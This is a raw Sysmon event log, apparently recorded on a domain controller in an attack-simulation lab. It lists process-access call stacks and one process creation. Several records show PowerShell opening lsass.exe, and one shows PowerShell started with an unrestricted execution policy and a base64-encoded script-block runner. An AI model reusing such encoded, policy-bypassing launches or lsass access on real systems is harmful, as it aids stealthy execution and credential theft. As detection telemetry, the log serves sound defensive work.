15:52:10.236{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003379Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003378Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003377Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CAA-5FA1-A400-000000008801}4456C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003376Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.236{D28789B6-7CAA-5FA1-A300-000000008801}13324500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7CAA-5FA1-A400-000000008801}4456C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+316032a6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31555466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a64997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30ac2e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a982e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30aa3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31555466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a8ac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30a8a232(wow64) 154100x80000000000000003375Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.243{D28789B6-7CAA-5FA1-A400-000000008801}4456C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7CA9-5FA1-1A91-060000000000}0x6911a0HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003374Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.220{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003373Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.220{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003372Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.220{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003371Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.173{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003370Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.173{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003369Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.142{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_v53kmvpz.g3v.ps12020-11-03 15:52:10.142 10341000x80000000000000003368Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.126{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003367Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7CA9-5FA1-A000-000000008801}46365092C:\Windows\system32\conhost.exe{D28789B6-7CAA-5FA1-A300-000000008801}1332C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003366Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003365Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003364Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003363Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003362Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003361Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003360Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003359Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:10.095{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003358Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 